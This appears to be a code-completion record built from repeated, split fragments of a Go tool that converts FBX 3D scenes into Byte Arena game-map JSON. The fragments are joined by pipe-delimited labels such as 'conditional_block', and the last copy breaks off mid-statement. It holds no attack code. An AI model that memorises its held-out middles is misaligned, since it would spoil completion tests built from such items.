}
return mat
}
type fbxGeometry struct {
id int64
name string
vertices []float64
indices []int
faces []faceType
}
func (g *fbxGeometry) getTransformedFaces(transform mgl64.Mat4) []faceType {
res := make([]faceType, len(g.faces))
for i, face := range g.faces {
res[i] = face.applyTransform(transform)
}
return res
}
type marshChild struct {
Name string `json:"name"`
Children json.RawMessage `json:"children"`
Properties []marshProperty `json:"properties"`
}
type marshProperty struct {
Type string `json:"type"`
Value json.RawMessage `json:"value"`
}
///////////////////////////////////////////////////////////////////////////////
func makeSortedEdge(a, b vertexType) edgeType {
var min, max = a, b
if min[0] > max[0] {
max, min = min, max
} else if min[0] == max[0] && min[1] > max[1] {
max, min = min, max
} else if min[0] == max[0] && min[1] == max[1] && min[2] > max[2] {
max, min = min, max
}
return edgeType{
min,
max,
}
}
func polygonFrom2DMesh(faces []faceType) mapcontainer.MapPolygon {
edges := make([]edgeType, 0)
polygon := make([]vector.Vector2, 0)
for _, face := range faces {
edges = append(edges, face.GetEdges()...)
}
// sort edges
sortedEdges := make([]edgeType, len(edges))
for i, edge := range edges {
sortedEdges[i] = makeSortedEdge(edge[0], edge[1])
}
type edgecount struct {
count int
edge edgeType
}
countedEdges := make(map[string]*edgecount)
for _, edge := range sortedEdges {
hash := getKeyForEdge(edge)
//fmt.Println("HASH", hash)
_, ok := countedEdges[hash]
if !ok {
countedEdges[hash] = &edgecount{
count: 1,
edge: edge,
}
} else {
countedEdges[hash].count++
}
}
//spew.Dump(points)
//spew.Dump(countedEdges)
outlineEdges := make([]edgeType, 0)
// stabilizing map iteration (easier for debug)
var countedEdgesKeys []string
for k := range countedEdges {
countedEdgesKeys = append(countedEdgesKeys, k)
}
sort.Strings(countedEdgesKeys)
for _, countedEdgeKey := range countedEdgesKeys {
countedEdge := countedEdges[countedEdgeKey]
if countedEdge.count == 1 {
outlineEdges = append(outlineEdges, countedEdge.edge)
}
}
if len(outlineEdges) == 0 {
return mapcontainer.MapPolygon{}
}
/////////////////////////////////////////////////////////////
// putting edges in the right order for the polygon
/////////////////////////////////////////////////////////////
outline := make([]edgeType, 0)
// taking the leftmost point as a starting point
var leftMostEdge *edgeType
for _, edge := range outlineEdges {
if leftMostEdge == nil || leftMostEdge[0][0] > edge[0][0] {
leftMostEdge = &edge
}
}
outline = append(outline, *leftMostEdge)
done := false
for i := 1; i < len(outlineEdges); i++ {
head := outline[i-1]
found := false
for _, edge := range outlineEdges {
if head.Equals(edge) {
continue
}
if head[1].Equals(edge[0]) {
outline = append(outline, edge)
found = true
done = edge.Equals(outline[0])
break
} else if head[1].Equals(edge[1]) {
// swap edge points
edge[0], edge[1] = edge[1], edge[0]
outline = append(outline, edge)
found = true
done = edge.Equals(outline[0])
break
}
}
if !found {
fmt.Println("Next edge not found in outlinesFrom2DMesh for", head, outlineEdges)
//os.Exit(1)
break
}
if done {
break
}
}
// /////////////////////////////////////////////////////////////
// /////////////////////////////////////////////////////////////
// // convert edges to points (vector2)
for _, edge := range outline {
polygon = append(polygon, vector.MakeVector2(edge[0][0], edge[0][1]))
}
// // ensure winding
polygon, err := polygonutils.EnsureWinding(polygonutils.CartesianSystemWinding.CCW, polygon)
if err != nil |
points := make([]mapcontainer.MapPoint, 0)
for _, vec2 := range polygon {
points = append(points, mapcontainer.MapPoint{vec2.GetX(), vec2.GetY()})
}
return mapcontainer.MapPolygon{Points: points}
}
func getKeyForEdge(edge edgeType) string {
return fmt.Sprintf("%.5f_%.5f_%.5f_%.5f", edge[0][0], edge[0][1], edge[1][0], edge[1][1])
}
///////////////////////////////////////////////////////////////////////////////
///////////////////////////////////////////////////////////////////////////////
type ModelNameCollection []string
func (c ModelNameCollection) Contains(search string) int {
for i, group := range c {
if strings.Contains(group, search) {
return i
}
}
return -1
}
func getNodeNames(i *fbxModel) ModelNameCollection {
var model *fbxModel = i
res := make(ModelNameCollection, 0)
for model != nil {
if model.name != "" {
res = append(res, model.name)
}
model = model.parent
}
return res
}
type ModelNameFunction struct {
Function string
Args json.RawMessage
Original string
}
func (c ModelNameCollection) GetFunctions() []ModelNameFunction {
funcs := make([]ModelNameFunction, 0)
r := regexp.MustCompile("^ba:([a-zA-Z]+)\\((.*?)\\)$")
for _, group := range c {
parts := strings.Split(group, "-")
for _, part := range parts {
if r.MatchString(part) {
matches := r.FindStringSubmatch(part)
funcs = append(funcs, ModelNameFunction{
Function: matches[1],
Args: json.RawMessage("[" + matches[2] + "]"),
Original: part,
})
}
}
}
return funcs
}
| {
fmt.Println(err)
return mapcontainer.MapPolygon{}
} | conditional_block |
main.go | package main
import (
"bytes"
"encoding/json"
"flag"
"fmt"
"os"
"os/exec"
"regexp"
"runtime"
"sort"
"strconv"
"strings"
"time"
"github.com/go-gl/mathgl/mgl64"
"github.com/bytearena/core/common/types/mapcontainer"
"github.com/bytearena/core/common/utils/number"
polygonutils "github.com/bytearena/core/common/utils/polygon"
"github.com/bytearena/core/common/utils/vector"
)
const AxisX = 0
const AxisY = 1
const AxisZ = 2
// Blender Sign FBX Sign
// CoordAxis AxisX = 0 1 AxisX = 0 1
// UpAxis AxisZ = 2 1 AxisY = 1 1
// FrontAxis AxisY = 1 -1 AxisZ = 2 1
// => For blender, FrontAxis is 1 when pointing away from the camera, and -1 when pointing towards the camera; it's the opposite for FBX
// => yet blenders does not set the sign to -1 on FrontAxis when exporting; see https://developer.blender.org/T43935 ?
// (1,0,0) (1,0,0)
// (0,1,0) (0,0,-1)
// (0,0,1) (0,1,0)
// => -z (fbx) becomes y (corrected vertice)
// => y (fbx) becomes z
func fixCoordSystem(p vertexType) vertexType {
return vertexType{
p[0],
-1.0 * p[2],
p[1],
}
}
func main() {
var fbxdumpCmd string
switch runtime.GOOS {
case "darwin":
{
fbxdumpCmd = "./bin/fbxdump-macos"
}
case "linux":
{
fbxdumpCmd = "./bin/fbxdump-linux"
}
default:
{
fmt.Println("map-builder-fbx may be used only on linux or macos")
os.Exit(1)
}
}
sourcefilepath := flag.String("in", "", "Input fbx file; required")
flag.Parse()
if *sourcefilepath == "" {
fmt.Println("--in is required; ex: --in ~/map.fbx")
os.Exit(1)
}
stderr := &bytes.Buffer{}
stdout := &bytes.Buffer{}
cmd := exec.Command(
fbxdumpCmd,
*sourcefilepath,
)
cmd.Env = nil
cmd.Stdin = os.Stdin
cmd.Stdout = stdout
cmd.Stderr = stderr
err := cmd.Run()
if err != nil {
fmt.Println("Error: error during fbxdump; " + stderr.String())
os.Exit(1)
}
// fmt.Println(stdout)
// os.Exit(0)
geometries := make(map[int64]*fbxGeometry)
models := make(map[int64]*fbxModel)
var f map[string]json.RawMessage
json.Unmarshal(stdout.Bytes(), &f)
var topchildren []marshChild
json.Unmarshal(f["children"], &topchildren)
scene := fbxScene{}
for _, topchild := range topchildren {
if topchild.Name == "GlobalSettings" {
var children2 []marshChild
json.Unmarshal(topchild.Children, &children2)
for _, child2 := range children2 {
if child2.Name == "Properties70" {
var children3 []marshChild
json.Unmarshal(child2.Children, &children3)
for _, child3 := range children3 {
if child3.Name == "P" {
var propname string
json.Unmarshal(child3.Properties[0].Value, &propname)
var valuePointer *int
switch propname {
case "UpAxis":
valuePointer = &scene.upAxis
case "UpAxisSign":
valuePointer = &scene.upAxisSign
case "FrontAxis":
valuePointer = &scene.frontAxis
case "FrontAxisSign":
valuePointer = &scene.frontAxisSign
case "CoordAxis":
valuePointer = &scene.coordsAxis
case "CoordAxisSign":
valuePointer = &scene.coordsAxisSign
default:
continue
}
var value int
json.Unmarshal(child3.Properties[4].Value, &value)
*valuePointer = value
}
}
}
}
}
if topchild.Name == "Objects" {
var children2 []marshChild
json.Unmarshal(topchild.Children, &children2)
for _, child2 := range children2 {
if child2.Name == "Geometry" {
geometry := fbxGeometry{}
json.Unmarshal(child2.Properties[0].Value, &geometry.id)
json.Unmarshal(child2.Properties[1].Value, &geometry.name)
// cut name up to \null
geometry.name = strings.Split(geometry.name, "\x00")[0]
var children3 []marshChild
json.Unmarshal(child2.Children, &children3)
for _, child3 := range children3 {
if child3.Name == "Vertices" {
json.Unmarshal(child3.Properties[0].Value, &geometry.vertices)
}
if child3.Name == "PolygonVertexIndex" {
json.Unmarshal(child3.Properties[0].Value, &geometry.indices)
if len(geometry.indices) > 0 {
poly := make(faceType, 0)
for _, geometryIndex := range geometry.indices {
endPoly := false
if geometryIndex < 0 {
// https://www.scratchapixel.com/lessons/3d-basic-rendering/introduction-polygon-mesh/polygon-mesh-file-formats
geometryIndex = geometryIndex*-1 - 1
endPoly = true
}
offset := geometryIndex * 3
p := vertexType{geometry.vertices[offset+0], geometry.vertices[offset+1], geometry.vertices[offset+2]}
poly = append(poly, fixCoordSystem(p))
if endPoly {
geometry.faces = append(geometry.faces, poly)
poly = make(faceType, 0)
}
}
if len(poly) > 0 {
geometry.faces = append(geometry.faces, poly)
}
} else {
poly := make(faceType, 0)
for i := 0; i < len(geometry.vertices)/3; i++ {
offset := i * 3
p := vertexType{geometry.vertices[offset+0], geometry.vertices[offset+1], geometry.vertices[offset+2]}
poly = append(poly, fixCoordSystem(p))
}
geometry.faces = append(geometry.faces, poly)
}
}
}
geometries[geometry.id] = &geometry
} else if child2.Name == "Model" {
model := fbxModel{}
json.Unmarshal(child2.Properties[0].Value, &model.id)
json.Unmarshal(child2.Properties[1].Value, &model.name)
// cut name up to \null
model.name = strings.Split(model.name, "\x00")[0]
var children3 []marshChild
json.Unmarshal(child2.Children, &children3)
for _, child3 := range children3 {
if child3.Name == "Properties70" {
//json.Unmarshal(child3.Properties[0].Value, &geometry.vertices)
transform := fbxTransform{}
var children4 []marshChild
json.Unmarshal(child3.Children, &children4)
for _, child4 := range children4 {
if len(child4.Properties) != 7 {
// always 7 properties on a transform aspect child; example:
// "properties": [
// { "type": "S", "value": "Lcl Translation" },
// { "type": "S", "value": "Lcl Translation" },
// { "type": "S", "value": "" },
// { "type": "S", "value": "A" },
// { "type": "D", "value": 407.526001 },
// { "type": "D", "value": 578.080200 },
// { "type": "D", "value": 25.511261 }
// ]
continue
}
var kind string
json.Unmarshal(child4.Properties[0].Value, &kind)
switch kind {
case "Lcl Translation":
{ // position (local translation)
json.Unmarshal(child4.Properties[4].Value, &transform.translation[0])
json.Unmarshal(child4.Properties[5].Value, &transform.translation[1])
json.Unmarshal(child4.Properties[6].Value, &transform.translation[2])
transform.translation = fixCoordSystem(transform.translation)
}
case "Lcl Rotation":
{ // position (local rotation)
json.Unmarshal(child4.Properties[4].Value, &transform.rotation[0])
json.Unmarshal(child4.Properties[5].Value, &transform.rotation[1])
json.Unmarshal(child4.Properties[6].Value, &transform.rotation[2])
transform.rotation = fixCoordSystem(transform.rotation)
}
case "Lcl Scaling":
{ // position (local scaling)
json.Unmarshal(child4.Properties[4].Value, &transform.scaling[0])
json.Unmarshal(child4.Properties[5].Value, &transform.scaling[1])
json.Unmarshal(child4.Properties[6].Value, &transform.scaling[2])
transform.scaling = fixCoordSystem(transform.scaling)
}
}
}
model.transform = transform
}
}
models[model.id] = &model
}
}
}
}
for _, topchild := range topchildren {
if topchild.Name != "Connections" {
continue
}
var children2 []marshChild
json.Unmarshal(topchild.Children, &children2)
for _, child2 := range children2 {
if child2.Name != "C" {
continue
}
var idOne int64
var idTwo int64
json.Unmarshal(child2.Properties[1].Value, &idOne)
json.Unmarshal(child2.Properties[2].Value, &idTwo)
// Si idOne => model && idTwo empty => model sans parent
// si idOne => geometry && idTwo model => idTwo.geometry = idOne
// si idOne => model && idTwo model => idOne.parent = idTwo
_, idOneIsModel := models[idOne]
_, idOneIsGeometry := geometries[idOne]
idTwoIsEmpty := idTwo == 0
_, idTwoIsModel := models[idTwo]
if idOneIsModel && idTwoIsEmpty {
modelOne, _ := models[idOne]
modelOne.parent = nil
} else if idOneIsGeometry && idTwoIsModel {
geometryOne, _ := geometries[idOne]
modelTwo, _ := models[idTwo]
modelTwo.geometry = geometryOne
} else if idOneIsModel && idTwoIsModel {
modelOne, _ := models[idOne]
modelTwo, _ := models[idTwo]
modelOne.parent = modelTwo
modelTwo.children = append(modelTwo.children, modelOne)
}
}
}
modelsObstacle := make([]*fbxModel, 0)
modelsGround := make([]*fbxModel, 0)
modelsStart := make([]*fbxModel, 0)
for _, model := range models {
if model.geometry == nil {
continue
}
modelnames := getNodeNames(model)
if modelnames.Contains("ba:obstacle") > -1 {
modelsObstacle = append(modelsObstacle, model)
}
if modelnames.Contains("ba:ground") > -1 {
modelsGround = append(modelsGround, model)
}
if modelnames.Contains("ba:start") > -1 {
modelsStart = append(modelsStart, model)
}
}
grounds := make([]mapcontainer.MapGround, 0)
obstacles := make([]mapcontainer.MapObstacleObject, 0)
starts := make([]mapcontainer.MapStart, 0)
for _, model := range modelsObstacle {
//fmt.Println("# " + model.name)
obstacles = append(obstacles, mapcontainer.MapObstacleObject{
Id: strconv.Itoa(int(model.id)),
Name: model.name,
Polygon: polygonFrom2DMesh(
model.geometry.getTransformedFaces(model.getFullTransform()),
),
})
}
for _, model := range modelsGround {
//fmt.Println("# " + model.name)
grounds = append(grounds, mapcontainer.MapGround{
Id: strconv.Itoa(int(model.id)),
Name: model.name,
Polygon: polygonFrom2DMesh(
model.geometry.getTransformedFaces(model.getFullTransform()),
),
})
}
for _, start := range modelsStart {
origin := vertexType{0, 0, 0}.applyTransform(start.getFullTransform())
starts = append(starts, mapcontainer.MapStart{
Id: strconv.Itoa(int(start.id)),
Name: start.name,
Point: mapcontainer.MapPoint{
origin[0],
origin[1],
},
})
}
builtmap := mapcontainer.MapContainer{}
builtmap.Meta.Readme = "Byte Arena Map"
builtmap.Meta.Kind = "deathmatch"
builtmap.Meta.MaxContestants = len(starts)
builtmap.Meta.Date = time.Now().Format(time.RFC3339)
builtmap.Data.Grounds = grounds
builtmap.Data.Starts = starts
builtmap.Data.Obstacles = obstacles
bjsonmap, _ := json.MarshalIndent(builtmap, "", " ")
fmt.Println(string(bjsonmap))
}
func | (polygon []vector.Vector2) {
fmt.Println("<svg height='700' width='500'><g transform='translate(700,350) scale(4)'>")
for i := 0; i < len(polygon); i++ {
nextIndex := 0
if i == len(polygon)-1 {
nextIndex = 0
} else {
nextIndex = i + 1
}
a := polygon[i]
b := polygon[nextIndex]
fmt.Println(fmt.Sprintf("<line title='Edge #%d' x1=\"%f\" y1=\"%f\" x2=\"%f\" y2=\"%f\" style=\"stroke: black; stroke-width: 0.1;\" />", i+1, a.GetX()*10, a.GetY()*10, b.GetX()*10, b.GetY()*10))
}
fmt.Println("</g></svg>")
}
type vertexType [3]float64
type edgeType [2]vertexType
type faceType []vertexType
func (a vertexType) Equals(b vertexType) bool {
return number.FloatEquals(a[0], b[0]) && number.FloatEquals(a[1], b[1]) && number.FloatEquals(a[2], b[2])
}
func (p vertexType) String() string {
return fmt.Sprintf("<vertex(%f, %f, %f)>", p[0], p[1], p[2])
}
func (p vertexType) applyTransform(transform mgl64.Mat4) vertexType {
res := mgl64.TransformCoordinate(
mgl64.Vec3{
p[0],
p[1],
p[2],
},
transform,
)
return vertexType{
res.X(),
res.Y(),
res.Z(),
}
}
func (a edgeType) Equals(b edgeType) bool {
return a[0].Equals(b[0]) && a[1].Equals(b[1]) || a[1].Equals(b[0]) && a[0].Equals(b[1])
}
func (face faceType) GetEdges() []edgeType {
edges := make([]edgeType, 0)
for i := 0; i < len(face); i++ {
nextIndex := i + 1
if i == len(face)-1 {
nextIndex = 0
}
edges = append(edges, edgeType{face[i], face[nextIndex]})
}
return edges
}
func (poly faceType) applyTransform(transform mgl64.Mat4) faceType {
res := make(faceType, len(poly))
for i, p := range poly {
res[i] = p.applyTransform(transform)
}
return res
}
type fbxScene struct {
upAxis int
upAxisSign int
frontAxis int
frontAxisSign int
coordsAxis int
coordsAxisSign int
}
type fbxTransform struct {
translation vertexType
rotation vertexType
scaling vertexType
}
type fbxModel struct {
parent *fbxModel
children []*fbxModel
id int64
name string
transform fbxTransform
geometry *fbxGeometry
}
func (model *fbxModel) getFullTransform() mgl64.Mat4 {
// ordre : local -> global
mats := make([]mgl64.Mat4, 0)
mats = append(mats, mgl64.Scale3D(0.01, 0.01, 0.01))
current := model
for current != nil {
var scale mgl64.Mat4
if current.transform.scaling[0] == 0.0 && current.transform.scaling[1] == 0.0 && current.transform.scaling[2] == 0.0 {
scale = mgl64.Scale3D(1, 1, 1)
} else {
scale = mgl64.Scale3D(current.transform.scaling[0], current.transform.scaling[1], current.transform.scaling[2])
}
rotx := mgl64.HomogRotate3DX(mgl64.DegToRad(current.transform.rotation[0]))
roty := mgl64.HomogRotate3DY(mgl64.DegToRad(current.transform.rotation[1]))
rotz := mgl64.HomogRotate3DZ(mgl64.DegToRad(current.transform.rotation[2]))
trans := mgl64.Translate3D(current.transform.translation[0]/100.0, current.transform.translation[1]/100.0, current.transform.translation[2]/100.0)
mat := mgl64.Ident4().
Mul4(trans).
Mul4(rotz).
Mul4(roty).
Mul4(rotx).
Mul4(scale)
mats = append(mats, mat)
current = current.parent
}
mat := mgl64.Ident4()
for i := len(mats) - 1; i >= 0; i-- {
mat = mat.Mul4(mats[i])
}
return mat
}
type fbxGeometry struct {
id int64
name string
vertices []float64
indices []int
faces []faceType
}
func (g *fbxGeometry) getTransformedFaces(transform mgl64.Mat4) []faceType {
res := make([]faceType, len(g.faces))
for i, face := range g.faces {
res[i] = face.applyTransform(transform)
}
return res
}
type marshChild struct {
Name string `json:"name"`
Children json.RawMessage `json:"children"`
Properties []marshProperty `json:"properties"`
}
type marshProperty struct {
Type string `json:"type"`
Value json.RawMessage `json:"value"`
}
///////////////////////////////////////////////////////////////////////////////
func makeSortedEdge(a, b vertexType) edgeType {
var min, max = a, b
if min[0] > max[0] {
max, min = min, max
} else if min[0] == max[0] && min[1] > max[1] {
max, min = min, max
} else if min[0] == max[0] && min[1] == max[1] && min[2] > max[2] {
max, min = min, max
}
return edgeType{
min,
max,
}
}
func polygonFrom2DMesh(faces []faceType) mapcontainer.MapPolygon {
edges := make([]edgeType, 0)
polygon := make([]vector.Vector2, 0)
for _, face := range faces {
edges = append(edges, face.GetEdges()...)
}
// sort edges
sortedEdges := make([]edgeType, len(edges))
for i, edge := range edges {
sortedEdges[i] = makeSortedEdge(edge[0], edge[1])
}
type edgecount struct {
count int
edge edgeType
}
countedEdges := make(map[string]*edgecount)
for _, edge := range sortedEdges {
hash := getKeyForEdge(edge)
//fmt.Println("HASH", hash)
_, ok := countedEdges[hash]
if !ok {
countedEdges[hash] = &edgecount{
count: 1,
edge: edge,
}
} else {
countedEdges[hash].count++
}
}
//spew.Dump(points)
//spew.Dump(countedEdges)
outlineEdges := make([]edgeType, 0)
// stabilizing map iteration (easier for debug)
var countedEdgesKeys []string
for k := range countedEdges {
countedEdgesKeys = append(countedEdgesKeys, k)
}
sort.Strings(countedEdgesKeys)
for _, countedEdgeKey := range countedEdgesKeys {
countedEdge := countedEdges[countedEdgeKey]
if countedEdge.count == 1 {
outlineEdges = append(outlineEdges, countedEdge.edge)
}
}
if len(outlineEdges) == 0 {
return mapcontainer.MapPolygon{}
}
/////////////////////////////////////////////////////////////
// putting edges in the right order for the polygon
/////////////////////////////////////////////////////////////
outline := make([]edgeType, 0)
// taking the leftmost point as a starting point
var leftMostEdge *edgeType
for _, edge := range outlineEdges {
if leftMostEdge == nil || leftMostEdge[0][0] > edge[0][0] {
leftMostEdge = &edge
}
}
outline = append(outline, *leftMostEdge)
done := false
for i := 1; i < len(outlineEdges); i++ {
head := outline[i-1]
found := false
for _, edge := range outlineEdges {
if head.Equals(edge) {
continue
}
if head[1].Equals(edge[0]) {
outline = append(outline, edge)
found = true
done = edge.Equals(outline[0])
break
} else if head[1].Equals(edge[1]) {
// swap edge points
edge[0], edge[1] = edge[1], edge[0]
outline = append(outline, edge)
found = true
done = edge.Equals(outline[0])
break
}
}
if !found {
fmt.Println("Next edge not found in outlinesFrom2DMesh for", head, outlineEdges)
//os.Exit(1)
break
}
if done {
break
}
}
// /////////////////////////////////////////////////////////////
// /////////////////////////////////////////////////////////////
// // convert edges to points (vector2)
for _, edge := range outline {
polygon = append(polygon, vector.MakeVector2(edge[0][0], edge[0][1]))
}
// // ensure winding
polygon, err := polygonutils.EnsureWinding(polygonutils.CartesianSystemWinding.CCW, polygon)
if err != nil {
fmt.Println(err)
return mapcontainer.MapPolygon{}
}
points := make([]mapcontainer.MapPoint, 0)
for _, vec2 := range polygon {
points = append(points, mapcontainer.MapPoint{vec2.GetX(), vec2.GetY()})
}
return mapcontainer.MapPolygon{Points: points}
}
func getKeyForEdge(edge edgeType) string {
return fmt.Sprintf("%.5f_%.5f_%.5f_%.5f", edge[0][0], edge[0][1], edge[1][0], edge[1][1])
}
///////////////////////////////////////////////////////////////////////////////
///////////////////////////////////////////////////////////////////////////////
type ModelNameCollection []string
func (c ModelNameCollection) Contains(search string) int {
for i, group := range c {
if strings.Contains(group, search) {
return i
}
}
return -1
}
func getNodeNames(i *fbxModel) ModelNameCollection {
var model *fbxModel = i
res := make(ModelNameCollection, 0)
for model != nil {
if model.name != "" {
res = append(res, model.name)
}
model = model.parent
}
return res
}
type ModelNameFunction struct {
Function string
Args json.RawMessage
Original string
}
func (c ModelNameCollection) GetFunctions() []ModelNameFunction {
funcs := make([]ModelNameFunction, 0)
r := regexp.MustCompile("^ba:([a-zA-Z]+)\\((.*?)\\)$")
for _, group := range c {
parts := strings.Split(group, "-")
for _, part := range parts {
if r.MatchString(part) {
matches := r.FindStringSubmatch(part)
funcs = append(funcs, ModelNameFunction{
Function: matches[1],
Args: json.RawMessage("[" + matches[2] + "]"),
Original: part,
})
}
}
}
return funcs
}
| debugPolygonSVG | identifier_name |
main.go | package main
import (
"bytes"
"encoding/json"
"flag"
"fmt"
"os"
"os/exec"
"regexp"
"runtime"
"sort"
"strconv"
"strings"
"time"
"github.com/go-gl/mathgl/mgl64"
"github.com/bytearena/core/common/types/mapcontainer"
"github.com/bytearena/core/common/utils/number"
polygonutils "github.com/bytearena/core/common/utils/polygon"
"github.com/bytearena/core/common/utils/vector"
)
const AxisX = 0
const AxisY = 1
const AxisZ = 2
// Blender Sign FBX Sign
// CoordAxis AxisX = 0 1 AxisX = 0 1
// UpAxis AxisZ = 2 1 AxisY = 1 1
// FrontAxis AxisY = 1 -1 AxisZ = 2 1
// => For blender, FrontAxis is 1 when pointing away from the camera, and -1 when pointing towards the camera; it's the opposite for FBX
// => yet blenders does not set the sign to -1 on FrontAxis when exporting; see https://developer.blender.org/T43935 ?
// (1,0,0) (1,0,0)
// (0,1,0) (0,0,-1)
// (0,0,1) (0,1,0)
// => -z (fbx) becomes y (corrected vertice)
// => y (fbx) becomes z
func fixCoordSystem(p vertexType) vertexType {
return vertexType{
p[0],
-1.0 * p[2],
p[1],
}
}
func main() {
var fbxdumpCmd string
switch runtime.GOOS {
case "darwin":
{
fbxdumpCmd = "./bin/fbxdump-macos"
}
case "linux":
{
fbxdumpCmd = "./bin/fbxdump-linux"
}
default:
{
fmt.Println("map-builder-fbx may be used only on linux or macos")
os.Exit(1)
}
}
sourcefilepath := flag.String("in", "", "Input fbx file; required")
flag.Parse()
if *sourcefilepath == "" {
fmt.Println("--in is required; ex: --in ~/map.fbx")
os.Exit(1)
}
stderr := &bytes.Buffer{}
stdout := &bytes.Buffer{}
cmd := exec.Command(
fbxdumpCmd,
*sourcefilepath,
)
cmd.Env = nil
cmd.Stdin = os.Stdin
cmd.Stdout = stdout
cmd.Stderr = stderr
err := cmd.Run()
if err != nil {
fmt.Println("Error: error during fbxdump; " + stderr.String())
os.Exit(1)
}
// fmt.Println(stdout)
// os.Exit(0)
geometries := make(map[int64]*fbxGeometry)
models := make(map[int64]*fbxModel)
var f map[string]json.RawMessage
json.Unmarshal(stdout.Bytes(), &f)
var topchildren []marshChild
json.Unmarshal(f["children"], &topchildren)
scene := fbxScene{}
for _, topchild := range topchildren {
if topchild.Name == "GlobalSettings" {
var children2 []marshChild
json.Unmarshal(topchild.Children, &children2)
for _, child2 := range children2 {
if child2.Name == "Properties70" {
var children3 []marshChild
json.Unmarshal(child2.Children, &children3)
for _, child3 := range children3 {
if child3.Name == "P" {
var propname string
json.Unmarshal(child3.Properties[0].Value, &propname)
var valuePointer *int
switch propname {
case "UpAxis":
valuePointer = &scene.upAxis
case "UpAxisSign":
valuePointer = &scene.upAxisSign
case "FrontAxis":
valuePointer = &scene.frontAxis
case "FrontAxisSign":
valuePointer = &scene.frontAxisSign
case "CoordAxis":
valuePointer = &scene.coordsAxis
case "CoordAxisSign":
valuePointer = &scene.coordsAxisSign
default:
continue
}
var value int
json.Unmarshal(child3.Properties[4].Value, &value)
*valuePointer = value
}
}
}
}
}
if topchild.Name == "Objects" {
var children2 []marshChild
json.Unmarshal(topchild.Children, &children2)
for _, child2 := range children2 {
if child2.Name == "Geometry" {
geometry := fbxGeometry{}
json.Unmarshal(child2.Properties[0].Value, &geometry.id)
json.Unmarshal(child2.Properties[1].Value, &geometry.name)
// cut name up to \null
geometry.name = strings.Split(geometry.name, "\x00")[0]
var children3 []marshChild
json.Unmarshal(child2.Children, &children3)
for _, child3 := range children3 {
if child3.Name == "Vertices" {
json.Unmarshal(child3.Properties[0].Value, &geometry.vertices)
}
|
if len(geometry.indices) > 0 {
poly := make(faceType, 0)
for _, geometryIndex := range geometry.indices {
endPoly := false
if geometryIndex < 0 {
// https://www.scratchapixel.com/lessons/3d-basic-rendering/introduction-polygon-mesh/polygon-mesh-file-formats
geometryIndex = geometryIndex*-1 - 1
endPoly = true
}
offset := geometryIndex * 3
p := vertexType{geometry.vertices[offset+0], geometry.vertices[offset+1], geometry.vertices[offset+2]}
poly = append(poly, fixCoordSystem(p))
if endPoly {
geometry.faces = append(geometry.faces, poly)
poly = make(faceType, 0)
}
}
if len(poly) > 0 {
geometry.faces = append(geometry.faces, poly)
}
} else {
poly := make(faceType, 0)
for i := 0; i < len(geometry.vertices)/3; i++ {
offset := i * 3
p := vertexType{geometry.vertices[offset+0], geometry.vertices[offset+1], geometry.vertices[offset+2]}
poly = append(poly, fixCoordSystem(p))
}
geometry.faces = append(geometry.faces, poly)
}
}
}
geometries[geometry.id] = &geometry
} else if child2.Name == "Model" {
model := fbxModel{}
json.Unmarshal(child2.Properties[0].Value, &model.id)
json.Unmarshal(child2.Properties[1].Value, &model.name)
// cut name up to \null
model.name = strings.Split(model.name, "\x00")[0]
var children3 []marshChild
json.Unmarshal(child2.Children, &children3)
for _, child3 := range children3 {
if child3.Name == "Properties70" {
//json.Unmarshal(child3.Properties[0].Value, &geometry.vertices)
transform := fbxTransform{}
var children4 []marshChild
json.Unmarshal(child3.Children, &children4)
for _, child4 := range children4 {
if len(child4.Properties) != 7 {
// always 7 properties on a transform aspect child; example:
// "properties": [
// { "type": "S", "value": "Lcl Translation" },
// { "type": "S", "value": "Lcl Translation" },
// { "type": "S", "value": "" },
// { "type": "S", "value": "A" },
// { "type": "D", "value": 407.526001 },
// { "type": "D", "value": 578.080200 },
// { "type": "D", "value": 25.511261 }
// ]
continue
}
var kind string
json.Unmarshal(child4.Properties[0].Value, &kind)
switch kind {
case "Lcl Translation":
{ // position (local translation)
json.Unmarshal(child4.Properties[4].Value, &transform.translation[0])
json.Unmarshal(child4.Properties[5].Value, &transform.translation[1])
json.Unmarshal(child4.Properties[6].Value, &transform.translation[2])
transform.translation = fixCoordSystem(transform.translation)
}
case "Lcl Rotation":
{ // position (local rotation)
json.Unmarshal(child4.Properties[4].Value, &transform.rotation[0])
json.Unmarshal(child4.Properties[5].Value, &transform.rotation[1])
json.Unmarshal(child4.Properties[6].Value, &transform.rotation[2])
transform.rotation = fixCoordSystem(transform.rotation)
}
case "Lcl Scaling":
{ // position (local scaling)
json.Unmarshal(child4.Properties[4].Value, &transform.scaling[0])
json.Unmarshal(child4.Properties[5].Value, &transform.scaling[1])
json.Unmarshal(child4.Properties[6].Value, &transform.scaling[2])
transform.scaling = fixCoordSystem(transform.scaling)
}
}
}
model.transform = transform
}
}
models[model.id] = &model
}
}
}
}
for _, topchild := range topchildren {
if topchild.Name != "Connections" {
continue
}
var children2 []marshChild
json.Unmarshal(topchild.Children, &children2)
for _, child2 := range children2 {
if child2.Name != "C" {
continue
}
var idOne int64
var idTwo int64
json.Unmarshal(child2.Properties[1].Value, &idOne)
json.Unmarshal(child2.Properties[2].Value, &idTwo)
// Si idOne => model && idTwo empty => model sans parent
// si idOne => geometry && idTwo model => idTwo.geometry = idOne
// si idOne => model && idTwo model => idOne.parent = idTwo
_, idOneIsModel := models[idOne]
_, idOneIsGeometry := geometries[idOne]
idTwoIsEmpty := idTwo == 0
_, idTwoIsModel := models[idTwo]
if idOneIsModel && idTwoIsEmpty {
modelOne, _ := models[idOne]
modelOne.parent = nil
} else if idOneIsGeometry && idTwoIsModel {
geometryOne, _ := geometries[idOne]
modelTwo, _ := models[idTwo]
modelTwo.geometry = geometryOne
} else if idOneIsModel && idTwoIsModel {
modelOne, _ := models[idOne]
modelTwo, _ := models[idTwo]
modelOne.parent = modelTwo
modelTwo.children = append(modelTwo.children, modelOne)
}
}
}
modelsObstacle := make([]*fbxModel, 0)
modelsGround := make([]*fbxModel, 0)
modelsStart := make([]*fbxModel, 0)
for _, model := range models {
if model.geometry == nil {
continue
}
modelnames := getNodeNames(model)
if modelnames.Contains("ba:obstacle") > -1 {
modelsObstacle = append(modelsObstacle, model)
}
if modelnames.Contains("ba:ground") > -1 {
modelsGround = append(modelsGround, model)
}
if modelnames.Contains("ba:start") > -1 {
modelsStart = append(modelsStart, model)
}
}
grounds := make([]mapcontainer.MapGround, 0)
obstacles := make([]mapcontainer.MapObstacleObject, 0)
starts := make([]mapcontainer.MapStart, 0)
for _, model := range modelsObstacle {
//fmt.Println("# " + model.name)
obstacles = append(obstacles, mapcontainer.MapObstacleObject{
